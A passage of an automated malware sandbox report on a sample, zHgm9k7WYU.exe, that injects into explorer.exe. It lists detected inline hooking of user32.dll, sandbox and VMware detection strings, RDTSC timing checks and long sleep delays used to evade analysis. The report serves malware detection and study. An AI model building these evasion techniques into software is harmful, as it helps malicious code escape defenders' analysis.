          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_010B6BA6 pushfd ; iretd 7_2_010B6BA7
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_010BCF0B push eax; ret 7_2_010BCF72
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_010BCF02 push eax; ret 7_2_010BCF08
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_010BCF6C push eax; ret 7_2_010BCF72
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_010B7694 push esi; iretd 7_2_010B7699
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_010BCEB5 push eax; ret 7_2_010BCF08
          Source: initial sample | Static PE information: section name: .text entropy: 7.44897781491

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE4
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM_3
          Source: Yara match | File source: 00000000.00000002.254778297.0000000002D31000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: zHgm9k7WYU.exe PID: 1928, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exe | RDTSC instruction interceptor: First address: 00000000010A98E4 second address: 00000000010A98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exe | RDTSC instruction interceptor: First address: 00000000010A9B5E second address: 00000000010A9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe TID: 2260 | Thread sleep time: -31500s >= -30000s
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe TID: 4132 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5256 | Thread sleep count: 45 > 30
          Source: C:\Windows\explorer.exe TID: 5256 | Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 4396 | Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp | Binary or memory string: VMware
          Source: explorer.exe, 00000002.00000000.273817889.000000000891C000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.257951536.00000000011EE000.00000004.00000020.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.272926812.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.273817889.000000000891C000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp | Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp | Binary or memory string: VMWARE
          Source: explorer.exe, 00000002.00000002.569426220.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000002.569770754.00000000011EE000.00000004.00000020.sdmp | Binary or memory string: @%SystemRoot%\System32\mswsock.dll,-60102-9%SystemRoot%\system32\mswsock.dlle6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&
          Source: explorer.exe, 00000002.00000000.273897961.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000002.580860292.00000000053D7000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.272926812.0000000008270000.00000002.0000